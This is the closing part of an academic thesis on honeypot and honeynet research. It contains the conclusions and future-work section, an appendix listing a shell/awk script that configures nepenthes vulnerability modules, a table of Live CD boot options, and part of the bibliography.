In the previous chapters, we have presented concepts and applications of current honeypot and honeynet technologies. A honeypot, as “an information system resource whose value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003a), implements specific features such as a number of known security weaknesses that make it particularly appealing to adversaries. It serves as an electronic bait and helps security professionals collect extensive information about intruders. When multiple decoys are grouped into a honeynet, malicious activities can even be watched across an entire network segment.

With the bootable Live CD we have developed in the course of this thesis, such a honeynet may be deployed within a short amount of time. The CD is completely executed in memory and sets up an instance of the nepenthes honeypot in a secured environment. Nepenthes emulates various vulnerabilities that are frequently exploited by common types of self-spreading malware and permits capturing worms and computer viruses on a large scale. Thereby, we are able to efficiently assess the level of threat on the Internet.

In the second part of this thesis, we have watched human attackers within a honeynet of three decoys running Microsoft Windows- and Linux-based operating systems.
These machines were constantly probed throughout the observation period. Two of the attacks were particularly interesting: In one case, an adversary compromised a misconfigured database management program and started uploading copyright-protected media. In a different attack, a black hat connected to several underground communication channels after our system had been penetrated. We were able to monitor these channels using utilities that were published by the Honeynet Project. After investigating the recorded text messages, we found evidence of a lively trade in stolen credit card numbers and other confidential data.

In summary, honeypots and honeynets offer a systematic approach to come to a deeper understanding of adversaries and learn more about their tools, tactics, and motives. By watching the steps of intruders, we are able to collect empirical data and shed light on an Internet community which is frequently misunderstood and misperceived (cmp. Rogers, 2000a; Fötinger and Ziegler, 2004). These pro-active measures complement traditional, more defense-oriented fields of IT security. Furthermore, as electronic baits evolve and get more sophisticated, attackers will possibly be forced to react and start developing countermeasures in order to evade detection. Basic techniques have already been described by Corey (2003) and Corey (2004); other approaches have been demonstrated by Dornseif et al. (2004a) and Holz and Raynal (2005b) (cmp. Chapter 2). As Lance Spitzner points out, this is “a good indication that this technology has started to make a difference; (...) We are now making the attackers react to us; it’s one of the few ways we can take the initiative back” (see Honeynet Project, 2004b, p. 683).

However, it is also important to note that honeynet research suffers from specific inherent problems and faces certain limitations at the time of this writing. First, some of the major monitoring tools are still quite immature.
For example, the Sebek keystroke logging utility turned out to be incompatible with recent versions of Microsoft Windows operating systems and caused regular system crashes. Furthermore, some data capture components of the Honeywall periodically stopped working [1] and led to inconsistent data sources. The latter types of flaws were usually quickly fixed by participants of the Honeynet Project, though.

In addition, there appears to be a tendency for honeynet setups to mostly attract automated attacks and low-skilled intruders (see Honeynet Project, 2004b). In the course of our thesis, we have not witnessed any advanced or even new threats. Unfortunately, we did not see any system compromises due to exploit code either. On the other hand, many attackers initiated connections over encrypted communication channels whenever possible. Similar findings are reported by other security professionals as well (cmp. Honeynet Project, 2004b, p. 39, 58-59). Therefore, data capture as well as data analysis applications must be adapted to keep up with adversaries in the future.

Last but not least, legal implications of honeynet architectures have not been sufficiently evaluated yet. For instance, luring a black hat into a trap may fall in the scope of specific privacy- and entrapment-related acts (cmp. Spitzner, 2003d). To the best knowledge of the author, existing literature is focused on US law to date. Thus, deploying electronic baits in other countries remains a twilight zone.

Taking the different aspects into consideration, we find several areas of interest that are worth studying in more detail. These opportunities for future research are briefly illustrated below.

Opportunities for Future Research

In this thesis, we have concentrated on capturing and analyzing server-related malicious activities. This approach is effective to estimate the level of threat for common systems and services deployed on the Internet today.
On the other hand, as Provos and Holz (2007) point out, there has been a growing trend of attackers exploiting security weaknesses in typical user applications such as web browsers or email programs. For this reason, many authors suggest developing client-side honeypots and actively scanning web sites, chat rooms, and peer-to-peer (P2P) networks for malicious content (see Seifert et al., 2006; Danford, 2006; Ikinci et al., 2008). These types of honeypots are possibly also capable of capturing 0-day exploits and other new attack techniques that are unknown to the security community to date (cmp. Feinstein and Peck, 2007). Preliminary findings in this area are promising (see Wang et al., 2005).
Footnote 1: For more information, please see the discussion on the mailing list of the Honeynet Project, https://public.honeynet.org/mailman/listinfo
In addition, as members of the Honeynet Project (2004b) state, almost all honeynets are set up on external networks. Thus, there is a lack of empirical data regarding attacks by insiders, even though this group may cause severe havoc, particularly in a business-oriented environment (cmp. Rogers, 2005). Technically sophisticated production honeypots may help reveal malevolent behavior within organizations and cope with these risks.
Furthermore, Lance Spitzner argues, “most honeynets have been stand-alone deployments, giving you an isolated picture of threat activity” (see Honeynet Project, 2004b, p. 680). As we have explained in Chapter 3, distributed honeynets may solve these issues, because data are acquired from multiple sources. However, publicly available research results in this field are quite limited at the time of this writing (see Watson, 2007) and still need to be assessed in more detail in the future.
Last but not least, we feel psychological aspects in computer crime are still inadequately covered in the literature, even though, according to Max Kilger, “an understanding of the blackhat community is equally as important as an understanding of the technical tools used to discover their exploits” (see Honeynet Project, 2004b, p. 506). In recent years, various authors have attempted to develop statistically valid models of adversaries (cmp. Rogers, 2000a, 2005; Chantler, 1995; Woo, 2003; Fötinger and Ziegler, 2004). If we succeed in observing more advanced and sophisticated attackers, honeynets may well contribute to these activities.

A Configuration Script for the Nepenthes Honeypot

The behavior and appearance of the nepenthes low-interaction honeypot may be quickly and conveniently adapted with the graphical configuration interface that is implemented on the Live CD (see Section 4.3.3.2). The interface is technically based on a custom shell script which makes ample use of the dialog package by Vincent Stemen as well as the awk and sed text processing utilities.
In the following listing, an extract of the shell script is shown. The main configuration file nepenthes.conf is read in, and the list of nepenthes vulnerability modules is extracted with the help of specially crafted regular expressions (cmp. Lines 12 to 20). This list is displayed in a new module selection window in the next step as indicated in Lines 24 to 27 of Listing A.1. By clicking on a certain item, the user may then interactively enable or disable the respective component of the honeypot. After all changes have been made, the program settings are updated and come into effect once the decoy is restarted (see Lines 32 to 66).

 1  #!/bin/sh
 2
 3  tempfile=`tempfile 2>/dev/null` || tempfile=/tmp/conf$$
 4  trap "rm -f $tempfile" 0 1 2 5 15
 5
 6  # name of the nepenthes main configuration file
 7  NEPENTHES_CONFIG_FILE="(...)/etc/nepenthes/nepenthes.conf"
 8  ...
 9
10  # read in the nepenthes configuration file, and extract the names of
11  # the vulnerability modules
12  awk '/vuln.*\.so/{
13      total += 1;
14
15      # check if the module is disabled, i.e., is commented out
16      if ($1 ~ /\/\//)
17          print $2 " " total " off\n";
18      else
19          print $2 " " total " on\n"
20  }' $NEPENTHES_CONFIG_FILE > $tempfile
21
22  data=`cat $tempfile`
23
24  # display the module selection window
25  _vuln=$(/usr/bin/dialog --stdout --clear \
26      --backtitle "(...)" --title "Configure Vulnerability Modules" \
27      --checklist "\nPlease select the vulnerability modules you would like to enable at startup.\n" 0 0 10 $data)
28
29  ...
30
31  # save the new system settings
32  awk 'BEGIN {
33      # get the names of the selected modules
34      for (x=1; x<ARGC-2; x++) {
35          vuln[x-1]=ARGV[x];
36          delete ARGV[x]
37      }
38  }/vuln.*\.so/{
39      found=0
40
41      # activate the selected modules in the configuration file
42      for (module in vuln) {
43          if ($0 ~ vuln[module]) {
44              found=1;
45
46              # to activate a specific module in the configuration file,
47              # previously existing comment characters must be removed
48              if (($0 ~ /\/\//)) {
49                  ...
50                  sub("//", "", $0)
51
52                  # update the configuration file
53                  system("sed -e s\47/" config_entry "/" $0 "/\47 " ARGV[ARGC-1] " > " \
54                      ARGV[ARGC-2] " && cp " ARGV[ARGC-2] " " ARGV[ARGC-1])
55              }
56              break
57          }
58      }
59
60      # to deactivate a specific module in the configuration file,
61      # the respective entry must be commented out
62      if ((found==0) && (!($0 ~ /\/\//))) {
63          system("sed -e s\47/" $0 "/\\/\\/" $0 "/\47 " ARGV[ARGC-1] " > " \
64              ARGV[ARGC-2] " && cp " ARGV[ARGC-2] " " ARGV[ARGC-1])
65      }
66  }' $_vuln $tempfile $NEPENTHES_CONFIG_FILE

Listing A.1: Extract of the Configuration Script for the nepenthes Honeypot

B Boot Options of the Live CD

When the Live CD is launched, the user may invoke the Isolinux boot loader with different boot options (see Section 4.3.3.4). These options are passed to the system kernel in order to change specific, runtime-related aspects of the operating system. For instance, it is possible to disable certain hardware devices or adapt the default video mode. Such customizations are particularly useful in case the machine stalls or even unexpectedly crashes during the startup phase.
A brief description of the most important boot options is shown in Table B.1; a more detailed reference is available from the Linux Kernel Organization (2009). To take effect, the individual options must be added to the APPEND section of the respective boot label.

Boot Option                            Description
vga=<...>                              Changes the default video mode. Thereby, the CD can be run on systems with limited screen resolution capabilities. In order to switch to another mode, a so-called VESA (Video Electronics Standards Association) mode number must be entered. An overview of valid mode numbers is given by Knorr (2009).
acpi=off, nohotplug, nopcmcia, noagp   Disables specific autodetection routines for hardware devices, e.g., memory or video cards. This option is recommended in case the system stalls during the boot process.
nodma                                  Disables the Direct Memory Access (DMA) mode for hardware devices.
noauto, nohd, nocd                     Hardware drives such as disks or CD-ROM drives are not automatically mounted during the boot process. In order to access a specific disk or drive, it has to be manually mounted during runtime.
from=<...>                             Loads the Live CD from a specific drive or path. For example, the option from=/dev/hda1 invokes the CD from the first hard drive.
root=<...>                             Specifies the root device. In the case of the Live CD, the initial ram disk /dev/ram0 is mounted as root (see also Almesberger and Lermen, 2000).
passwd=<...>                           Sets the system password for the root superuser account to a specific string. In case the option is set to passwd=ask, the user is prompted to set a new password during the boot process.
changes=<...>                          Changes made at runtime are persistently stored to a specific file or drive. Thereby, no data are lost if the system is shut down or rebooted.
toram, copy2ram                        All files are copied to memory. Although this may consume large portions of space and slow down the boot process, operations at runtime may be significantly accelerated.
ramdisk_size=<...>                     Sets the size of the initial ram disk which serves as a temporary root file system during the boot process of the operating system. The default size of the disk is 4096 kB (see Gortmaker, 2004).
load=module                            Loads a specific file system module when booting the CD. In case the noload=<module> option is set, a certain module may be excluded from the boot process.
debug                                  Enables the debug mode during the boot process and reports the status of specific internal operations.
autoexec=<...>                         Executes a pre-defined command instead of displaying the default login manager. For instance, to automatically invoke the X Window System and skip the authentication procedure, the option must be set to autoexec=startx.

Table B.1: Important Boot Options of the Live CD (Source: Based on Matejicek, 2008a; Linux Kernel Organization, 2009)

References

[Ajzen 1991] Ajzen, Icek: The Theory of Planned Behavior. In: Organizational Behavior and Human Decision Processes 50 (1991), No. 2, p. 179–211
[Akerlof 1970] Akerlof, George A.: The Market for “Lemons”: Quality Uncertainty and the Market Mechanism. In: The Quarterly Journal of Economics 84 (1970), No. 3, p. 488–500
[Aleph One 1996] Aleph One: Smashing the Stack for Fun and Profit. In: Phrack Magazine 49 (1996), No. 14
[Almesberger and Lermen 2000] Almesberger, Werner ; Lermen, Hans: Using the Initial RAM Disk (initrd). Published: 2000. http://www.kernel.org/doc/Documentation/initrd.txt, Retrieved: August 11, 2009
[Andrews and Whittaker 2006] Andrews, Mike ; Whittaker, James A.: How to Break Web Software. Addison Wesley, 2006
[Antonomasia 2003] Antonomasia: Additional Logging for Honeypots. Published: 2003. http://www.notatla.org.uk/SOFTWARE/honeypot_code_description.html, Retrieved: August 11, 2009
[Bächer et al. 2008] Bächer, Paul ; Holz, Thorsten ; Kötter, Markus ; Wicherski, Georg: Know your Enemy: Tracking Botnets. Published: October 2008. http://honeynet.org/papers/bots/, Retrieved: August 11, 2009
[Bächer et al. 2006] Bächer, Paul ; Kötter, Markus ; Holz, Thorsten ; Dornseif, Maximillian ; Freiling, Felix: The Nepenthes Platform: An Efficient Approach to Collect Malware. In: 9th International Symposium on Recent Advances in Intrusion Detection, 2006
[Balas and Viecco 2005] Balas, Edward ; Viecco, Cimo: Towards a Third Generation Data Capture Architecture for Honeynets. In: Proceedings of the 6th IEEE Information Assurance Workshop, 2005, p. 21–28
[Baldwin 2002a] Baldwin, Lawrence: Pubstro Forensics. Published: September 2002.
http://www.mynetwatchman.com/kb/security/articles/winforensics/index.htm, Retrieved: August 11, 2009
[Baldwin 2002b] Baldwin, Lawrence ; myNetWatchman (Editor): Windows Messenger Delivery Options: SMB vs. MS RPC. Published: November 2002. http://www.mynetwatchman.com/kb/security/articles/popupspam/netsend.htm, Retrieved: August 11, 2009
[Baldwin 2003] Baldwin, Lawrence: myNetWatchman Alert - Windows PopUP SPAM. Published: September 2003. http://www.mynetwatchman.com/kb/security/articles/popupspam/, Retrieved: August 11, 2009
[Barford et al. 2002] Barford, Paul ; Kline, Jeffery ; Plonka, David ; Ron, Amos: A Signal Analysis of Network Traffic Anomalies. In: Proceedings of the 2nd ACM SIGCOMM Workshop on Internet Measurement, 2002
[Bastian 2004] Bastian, Waldo: The KDE User Guide. Published: June 2004. http://docs.kde.org/development/en/kdebase-runtime/userguide/index.html, Retrieved: August 11, 2009
[Bauer 2001] Bauer, Mick: Swatch: Automated Log Monitoring for the Vigilant but Lazy. Published: 2001. http://www.linuxjournal.com/article/4776, Retrieved: August 11, 2009
[Bernstein 1996] Bernstein, Daniel J.: SYN Cookies. Published: 1996. http://cr.yp.to/syncookies.html, Retrieved: August 11, 2009
[Bernstein 2005] Bernstein, Daniel J.: Cache-Timing Attacks on AES. Published: 2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf, Retrieved: August 11, 2009
[Brand 2007] Brand, Nicholas: The LiveCD List. Published: 2007. http://www.livecdlist.com/, Retrieved: August 11, 2009
[Brockmeier 2001] Brockmeier, Joe ; IBM DeveloperWorks (Editor): Slackware Linux 101 - A Look at what Happens when You Boot Your Linux Box. Published: March 2001. http://www.ibm.com/developerworks/linux/library/l-slack.html, Retrieved: August 11, 2009
[Brohan 2009] Brohan, Mark: The Top 500 Guide. Published: June 2009. http://www.internetretailer.com/article.asp?id=30594, Retrieved: August 11, 2009
[Brownlee et al. 1997] Brownlee, Nevil ; Mills, Carl ; Ruth, Gregory R.: RFC: 2063 - Traffic Flow Measurement: Architecture. Published: 1997. http://www.ietf.org/rfc/rfc2063.txt, Retrieved: August 11, 2009
[Buddenhagen 2007] Buddenhagen, Oswald: The KDM Handbook. Published: December 2007. http://docs.kde.org/kde3/en/kdebase/kdm/kdm.pdf, Retrieved: August 11, 2009
[Burr 2002] Burr, Simon: How to Break Out of a Chroot() Jail. Published: 2002. http://www.bpfh.net/simes/computing/chroot-break.html, Retrieved: August 11, 2009
[Cameron 2003] Cameron, Jamie: Managing Linux Systems with Webmin - System Administration and Module Development. Addison Wesley, 2003
[Capgemini 2008] Capgemini (Editor): Studie IT-Trends 2008 (German). Published: 2008. http://www.at.capgemini.com/m/at/tl/IT-Trends_2008.pdf, Retrieved: August 11, 2009
[Carrier 2006] Carrier, Brian D.: Risks of Live Digital Forensic Analysis. In: Communications of the ACM 49 (2006), No. 2, p. 56–61
[Caswell et al. 2007] Caswell, Brian ; Beale, Jay ; Baker, Andrew: Snort Intrusion Detection and Prevention Toolkit. Syngress Publishing, 2007
[CERT 1996] CERT (Editor): Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks. Published: 1996. http://www.cert.org/advisories/CA-1996-21.html, Retrieved: August 11, 2009
[CERT 1998] CERT (Editor): Advisory CA-1998-12 Remotely Exploitable Buffer Overflow Vulnerability in mountd. Published: 1998. http://www.cert.org/advisories/CA-1998-12.html, Retrieved: August 11, 2009
[CERT 2001a] CERT (Editor): Advisory CA-2001-19 “Code Red” Worm Exploiting Buffer Overflow In IIS Indexing Service DLL. Published: 2001. http://www.cert.org/advisories/CA-2001-19.html, Retrieved: August 11, 2009
[CERT 2001b] CERT (Editor): Advisory CA-2001-23 Continued Threat of the “Code Red” Worm. Published: 2001. http://www.cert.org/advisories/CA-2001-23.html, Retrieved: August 11, 2009
[CERT 2001c] CERT (Editor): Denial of Service Attacks. Published: June 2001.
http://www.cert.org/tech_tips/denial_of_service.html, Retrieved: August 11, 2009
[CERT 2003a] CERT (Editor): Advisory CA-2003-04 MS-SQL Server Worm. Published: January 2003. http://www.cert.org/advisories/CA-2003-04.html, Retrieved: August 11, 2009
[CERT 2003b] CERT (Editor): Advisory CA-2003-24 Buffer Management Vulnerability in OpenSSH. Published: 2003. http://www.cert.org/advisories/CA-2003-24.html, Retrieved: August 11, 2009
[CERT 2004] CERT (Editor): Computer Emergency Response Team: Vulnerability Note VU 497400. Published: November 2004. http://www.kb.cert.org/vuls/id/497400, Retrieved: August 11, 2009
[CERT 2009] CERT (Editor): CERT Statistics. Published: February 2009. http://www.cert.org/stats/, Retrieved: August 11, 2009
[Chang 2002] Chang, Rocky K. C.: Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial. In: IEEE Communications Magazine 40 (2002), No. 10, p. 42–51
[Chantler 1995] Chantler, Alan N.: Risk: The Profile of the Computer Hacker, School of Information Systems, Curtin Business School, (PhD Thesis), 1995
[Chiesa et al. 2009] Chiesa, Raoul ; Ciappi, Silvio ; Ducci, Stefania: Profiling Hackers - The Science of Criminal Profiling as Applied to the World of Hacking. Taylor & Francis Group, 2009
[Chung et al. 1995] Chung, Mandy ; Puketza, Nicholas ; Olsson, Ronald A. ; Mukherjee, Biswanath: Simulating Concurrent Intrusions for Testing Intrusion Detection Systems: Parallelizing Intrusions. In: Proceedings of the 1995 National Information Systems Security Conference, 1995
[Comer 2000] Comer, Douglas E.: Internetworking with TCP/IP: Principles, Protocols, and Architecture. 4th Edition. Prentice Hall, 2000
[Corey 2003] Corey, Joseph: Local Honeypot Identification. Published: 2003. http://www.ouah.org/p62-0x07.txt, Retrieved: August 11, 2009
[Corey 2004] Corey, Joseph: Advanced Honeypot Identification and Exploitation. Published: 2004.
http://www.ouah.org/p63-0x09.txt, Retrieved: August 11, 2009
[Craig and Burnett 2005] Craig, Paul ; Burnett, Mark: Software Piracy Exposed. Syngress Publishing, 2005
[Creasy 1981] Creasy, Robert J.: The Origin of the VM/370 Time-Sharing System. In: IBM Journal of Research and Development 25 (1981), No. 5, p. 483–490
[Criscuolo 2000] Criscuolo, Paul J.: Distributed Denial of Service. Published: February 2000. http://www.itsec.gov.cn/webportal/download/2000-CIAC-2319_Distributed_Denial_of_Service.pdf, Retrieved: August 11, 2009
[Cross and Shinder 2008] Cross, Michael ; Shinder, Debra L.: Scene of the Cybercrime. 2nd Edition. Syngress Publishing, 2008
[Curran et al. 2005] Curran, Kevin ; Morrissey, Colman ; Fafan, Colm ; Murphy, Colm ; O’Donnell, Brian ; Fitzpatrick, Gerry ; Condit, Stephen: Monitoring Hacker Activity with a Honeynet. In: International Journal of Network Management (2005), p. 123–134
[CVE 2003] CVE (Editor): CVE-2003-0466. Published: 2003. http://secunia.com/advisories/cve_reference/CVE-2003-0466/, Retrieved: August 11, 2009
[CVE 2005] CVE (Editor): CVE-2005-0200. Published: 2005. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0200, Retrieved: August 11, 2009
[CVE 2006a] CVE (Editor): CVE-2006-3392. Published: 2006. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392, Retrieved: August 11, 2009
[CVE 2006b] CVE (Editor): CVE-2006-6912. Published: 2006. http://secunia.com/advisories/cve_reference/CVE-2006-6912/, Retrieved: August 11, 2009
[Dalheimer and Welsh 2005] Dalheimer, Matthias K. ; Welsh, Matt: Running Linux. O’Reilly, 2005
[Danford 2006] Danford, Robert: 2nd Generation Honeyclients. Published: 2006. http://handlers.dshield.org/rdanford/pub/Honeyclients_Danford_SANSfire06.pdf, Retrieved: April 22, 2009
[Deloitte 2009] Deloitte (Editor): Losing Ground - TMT Global Security Survey. Published: 2009.
http://www.deloitte.com/dtt/cda/doc/content/me_fsi_281106_globalsecuritysurvey.pdf, Retrieved: August 11, 2009
[Dent 2002] Dent, Kyle D.: Postfix: The Definitive Guide. O’Reilly, 2002
[Dike 2006] Dike, Jeff: User Mode Linux. Prentice Hall, 2006
[DistroWatch 2007] DistroWatch (Editor): Linux Distributions - Facts and Figures. Published: July 2007. http://distrowatch.com/stats.php?section=popularity, Retrieved: August 11, 2009
[Dong-Hun 2003] Dong-Hun, You: Wu-FTPd v2.6.2 Off-by-One Remote 0day Exploit. Published: 2003. http://www.milw0rm.com/exploits/74, Retrieved: August 11, 2009
[Dornseif et al. 2004a] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian: NoSEBrEaK - Attacking Honeynets. In: Proceedings of the 5th Annual IEEE Information Assurance Workshop, 2004
[Dornseif et al. 2004b] Dornseif, Maximillian ; Holz, Thorsten ; Klein, Christian N.: NoSEBrEaK - Defeating Honeynets. Published: 2004. http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-holz/bh-us-04-holz-up.pdf, Retrieved: August 11, 2009
[Dougherty and Robbins 1997] Dougherty, Dale ; Robbins, Arnold: Sed & Awk. O’Reilly, 1997
[Ducea 2006] Ducea, Marius: Rotating Linux Log Files. Published: 2006. http://www.ducea.com/2006/06/06/rotating-linux-log-files/, Retrieved: August 11, 2009
[Eckstein et al. 2007] Eckstein, Robert ; Watters, Paul A. ; Ts, Jay ; Carter, Gerald: Using Samba. 3rd Edition. O’Reilly, 2007
[Eddy 2007] Eddy, Wesley M.: RFC: 4987 - TCP SYN Flooding Attacks and Common Mitigations. Published: 2007. http://www.ietf.org/rfc/rfc4987.txt, Retrieved: August 11, 2009
[Elnahrawy 2002] Elnahrawy, Eiman M.: Log-Based Chat Room Monitoring Using Text Categorization: A Comparative Study. In: Proceedings of the International Conference on Information and Knowledge Sharing, 2002
[Eurostats 2008] Eurostats (Editor): European Consumer Summit - Online Shopping by Individuals in EU27. Published: 2008.
http://epp.eurostat.ec.europa.eu, Retrieved: August 11, 2009
[Farmer and Venema 2005] Farmer, Dan ; Venema, Wietse: Forensic Discovery. Addison Wesley, 2005
[Feinstein and Peck 2007] Feinstein, Ben ; Peck, Daniel: Caffeine Monkey: Automated Collection, Detection and Analysis of JavaScript. Published: 2007. http://www.secureworks.com/research/blog/wp-content/uploads/bh-usa-07-feinstein_and_peck-WP.pdf, Retrieved: August 11, 2009
[Fishbein and Ajzen 1975] Fishbein, Martin ; Ajzen, Icek: Belief, Attitude, Intention and Behavior: An Introduction to Theory and Research. Addison Wesley, 1975
[Flenov 2005] Flenov, Michael: Hacker Linux Uncovered. A-LIST, 2005
[Floydman 2002] Floydman: ComLog.pl - A WIN32 Command Prompt Logger. Published: 2002. http://www.geocities.com/floydian_99/comlog.html, Retrieved: August 11, 2009
[Fötinger and Ziegler 2004] Fötinger, Christian S. ; Ziegler, Wolfgang: Understanding a Hacker’s Mind - A Psychological Insight into the Hijacking of Identities. May 2004
[Franklin and Paxson 2007] Franklin, Jason ; Paxson, Vern: An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants. In: Proceedings of the 14th ACM Conference on Computer and Communications Security, 2007
[Free Software Foundation 2007] Free Software Foundation (Editor): GNU General Public License. Published: 2007. http://www.gnu.org/licenses/gpl-3.0.html, Retrieved: August 11, 2009
[Friedl 2006] Friedl, Jeffrey E. F.: Mastering Regular Expressions. O’Reilly, 2006
[Friedl 2002] Friedl, Steve: Best Practices for UNIX chroot() Operations. Published: 2002. http://www.unixwiz.net/techtips/chroot-practices.html, Retrieved: August 11, 2009
[FrozenTech 2004a] FrozenTech (Editor): What is Your Favorite Full-Featured Desktop Live CD? Published: November 2004. http://www.livecdforums.com/viewtopic.php?t=149, Retrieved: August 11, 2009
[FrozenTech 2004b] FrozenTech (Editor): What LiveCD has the Best Hardware Support? Published: November 2004.
http://www.livecdforums.com/viewtopic.php?t=153, Retrieved: August 11, 2009
[FrozenTech 2005a] FrozenTech (Editor): What is the Easiest LiveCD to Customize? Published: July 2005. http://www.livecdforums.com/viewtopic.php?t=417, Retrieved: August 11, 2009
[FrozenTech 2005b] FrozenTech (Editor): What is Your Favorite PowerPC LiveCD? Published: March 2005. http://www.livecdforums.com/viewtopic.php?t=313, Retrieved: August 11, 2009
[Garfinkel et al. 2007] Garfinkel, Tal ; Adams, Keith ; Warfield, Andrew ; Franklin, Jason: Compatibility is Not Transparency: VMM Detection Myths and Realities. In: Proceedings of the 11th USENIX workshop on Hot topics in operating systems, 2007
[Garland 2008] Garland, Jason: Wireshark - Secure Socket Layer (SSL). Published: 2008. http://wiki.wireshark.org/SSL, Retrieved: August 11, 2009
[GNU Free Software Foundation 2009] GNU Free Software Foundation (Editor): Bash Reference Manual. Published: 2009. http://www.gnu.org/software/bash/manual/bashref.html, Retrieved: August 11, 2009
[Göbel et al. 2006] Göbel, Jan ; Hektor, Jens ; Holz, Thorsten: Advanced Honeypot-Based Intrusion Detection. In: The USENIX Magazine 31 (2006), December, No. 6, p. 17–25
[Goebel et al. 2007] Goebel, Jan ; Holz, Thorsten ; Willems, Carsten: Measurement and Analysis of Autonomous Spreading Malware in a University Environment. In: 4th GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment, 2007
[Goldberg 1974] Goldberg, Robert P.: Survey of Virtual Machine Research. In: IEEE Computer 7 (1974), No. 6, p. 34–45
[Gortmaker 2004] Gortmaker, Paul ; Linux Kernel Organization (Editor): Using the RAM Disk Block Device with Linux. Published: October 2004. http://www.kernel.org/doc/Documentation/blockdev/ramdisk.txt, Retrieved: August 11, 2009
[Hall 2005] Hall, Ronald J.: KDE Frequently Asked Questions: Description of the Base Packages. Published: January 2005.
http://docs.kde.org/development/en/kdebase-runtime/faq/index.html, Retrieved: August 11, 2009
[Handelman et al. 1999] Handelman, Sigmund ; Stibler, Stephen ; Brownlee, Nevil ; Ruth, Gregory R.: RFC: 2724 - New Attributes for Traffic Flow Measurement. Published: 1999. http://www.rfc-editor.org/rfc/rfc2724.txt, Retrieved: August 11, 2009
[Handley et al. 2001] Handley, Mark ; Paxson, Vern ; Kreibich, Christian: Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics. In: Proceedings of the 10th conference on USENIX Security Symposium, 2001
[Handley and Rescorla 2006] Handley, Mark ; Rescorla, Eric: RFC: 4732 - Internet Denial-of-Service Considerations. Published: November 2006. http://www.rfc-editor.org/rfc/rfc4732.txt, Retrieved: August 11, 2009
[Hansen and Atkins 1993] Hansen, Stephen E. ; Atkins, Todd: Automated System Monitoring and Notification With Swatch. In: Proceedings of the 7th USENIX Conference on System Administration, 1993, p. 145–152
[Henderson 2006] Henderson, Bryan: Introduction to Linux Loadable Kernel Modules. Published: 2006. http://tldp.org/HOWTO/Module-HOWTO/index.html, Retrieved: August 11, 2009
[Hollinger 1988] Hollinger, Richard C.: Computer Hackers Follow a Guttman-Like Progression. In: Social Sciences Review 72 (1988), p. 199–200
[Holz 2005] Holz, Thorsten: A Short Visit to the Bot Zoo. In: IEEE Security & Privacy 3 (2005), No. 3, p. 76–79
[Holz 2006] Holz, Thorsten: Learning More About Attack Patterns With Honeypots. In: Proceedings of Sicherheit - Schutz und Zuverlässigkeit, 2006
[Holz 2008] Holz, Thorsten: Collecting Malware - The Techniques Behind Nepenthes & Mwcollect. Published: 2008. http://www.sitic.se/seminarium/sitic_vs2006/nepenthes2.pdf, Retrieved: August 11, 2009
[Holz et al. 2006] Holz, Thorsten ; Marechal, Simon ; Raynal, Frederic: New Threats and Attacks on the World Wide Web. In: IEEE Security & Privacy 4 (2006), No. 2, p. 72–75
[Holz and Raynal 2005a] Holz, Thorsten ; Raynal, Frederic: Defeating Honeypots: System Issues, Part 2. Published: 2005. http://www.securityfocus.com/infocus/1828, Retrieved: August 11, 2009
[Holz and Raynal 2005b] Holz, Thorsten ; Raynal, Frederic: Detecting Honeypots and Other Suspicious Environments. In: Proceedings of the IEEE Workshop on Information Assurance and Security, 2005, p. 29–36
[Honeynet Project 2000a] Honeynet Project (Editor): Know Your Enemy: Motives. Published: 2000. http://old.honeynet.org/papers/motives/index.html, Retrieved: August 11, 2009
[Honeynet Project 2000b] Honeynet Project (Editor): Know Your Enemy: The Tools and Methodologies of the Script Kiddie. Published: 2000. http://old.honeynet.org/papers/enemy/index.html, Retrieved: August 11, 2009
[Honeynet Project 2002a] Honeynet Project (Editor): Know Your Enemy: Learning with User-Mode Linux. Published: 2002. http://old.honeynet.org/papers/uml/index.html, Retrieved: August 11, 2009
[Honeynet Project 2002b] Honeynet Project (Editor): Know your Enemy: Passive Fingerprinting. Published: 2002. http://old.honeynet.org/papers/finger/, Retrieved: August 11, 2009
[Honeynet Project 2003a] Honeynet Project (Editor): Know Your Enemy: A Profile. Published: 2003. http://old.honeynet.org/papers/profiles/cc-fraud.pdf, Retrieved: August 11, 2009
[Honeynet Project 2003b] Honeynet Project (Editor): Know Your Enemy: Defining Virtual Honeynets. Published: 2003. http://old.honeynet.org/papers/virtual/index.html, Retrieved: August 11, 2009
[Honeynet Project 2003c] Honeynet Project (Editor): Know Your Enemy: Sebek. Published: 2003. http://old.honeynet.org/papers/sebek.pdf, Retrieved: August 11, 2009
[Honeynet Project 2004a] Honeynet Project (Editor): Honeynet Definitions, Requirements, and Standards. Published: 2004.
http://old.honeynet.org/alliance/requirements.html, Retrieved: August 11, 2009
[Honeynet Project 2004b] Honeynet Project (Editor): Know your Enemy - Learning about Security Threats. Addison Wesley, 2004
[Honeynet Project 2004c] Honeynet Project (Editor): Know Your Enemy: Honeynets in Universities. Published: 2004. http://old.honeynet.org/papers/edu/, Retrieved: August 11, 2009
[Honeynet Project 2005a] Honeynet Project (Editor): Honeywall Configuration File. Published: 2005. http://yum.honeynet.org/roo/manual/txt/honeywall.conf, Retrieved: August 11, 2009
[Honeynet Project 2005b] Honeynet Project (Editor): Honeywall Initial Tripwire Setup. Published: 2005. http://yum.honeynet.org/roo/manual/txt/tripwire.txt, Retrieved: August 11, 2009
[Honeynet Project 2005c] Honeynet Project (Editor): Honeywall System Clock Information. Published: 2005. http://yum.honeynet.org/roo/manual/txt/clock.txt, Retrieved: August 11, 2009
[Honeynet Project 2005d] Honeynet Project (Editor): Know Your Enemy: Honeywall CDROM Roo. Published: 2005. http://old.honeynet.org/papers/cdrom/roo/index.html, Retrieved: August 11, 2009
[Honeynet Project 2005e] Honeynet Project (Editor): Know Your Enemy: GenII Honeynets. Published: 2005. http://old.honeynet.org/papers/gen2/index.html, Retrieved: August 11, 2009
[Honeynet Project 2006] Honeynet Project (Editor): Know Your Enemy: Honeynets. Published: 2006. http://old.honeynet.org/papers/honeynet/index.html, Retrieved: August 11, 2009
